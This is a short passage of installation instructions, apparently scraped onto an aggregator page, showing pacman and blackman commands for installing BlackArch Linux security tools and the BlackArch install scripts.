$ sudo pacman -S blackman

# Download, compile and install package:
$ sudo blackman -i <package>

# Download, compile and install whole category
$ sudo blackman -g <group>

# Download, compile and install all BlackArch tools
$ sudo blackman -a

# To list blackarch categories
$ blackman -l

# To list category tools
$ blackman -p <category>                                 


Installing from ISO

You can install BlackArch Linux (packages AND environment) using the Live or Netinstall medium.
# Install blackarch-install-scripts package
$ sudo pacman -S blackarch-install-scripts

# Now, you can run and follow the instructions
$ sudo blackarch-install


Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>